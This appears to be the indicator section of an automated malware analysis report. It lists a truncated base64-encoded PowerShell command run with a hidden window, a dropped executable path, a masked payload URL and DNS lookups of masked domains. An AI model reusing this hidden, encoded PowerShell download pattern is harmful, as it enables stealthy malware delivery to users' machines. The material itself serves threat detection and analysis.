Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAUABpAGsAcQBoAHAAawBzAGIAaABhACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEwAbABlAGwAaAB3AHIAdwBiAHIAYgAgACMAPgAgACQAVgBhAHEAZgBqAHoAawBkAHoAeABrAHcAZg...
- %HOMEPATH%\489.exe
- http://www.co###ket.info/softaculous/YVciwzq/
- DNS ASK an##l.ac.nz
- DNS ASK co###ket.info
- DNS ASK al######.000webhostapp.com
- DNS ASK ho####cietepromo.ca
- DNS ASK au####orsale.co.nz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAUABpAGsAcQBoAHAAawBzAGIAaABhACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEwAbABlAGwAaAB3AHIAdwBiAHIAYgAgACMAPgAgACQAVgBhAHEAZgBqAHoAawBkAHoAeABrAHcAZg...' (with hidden window)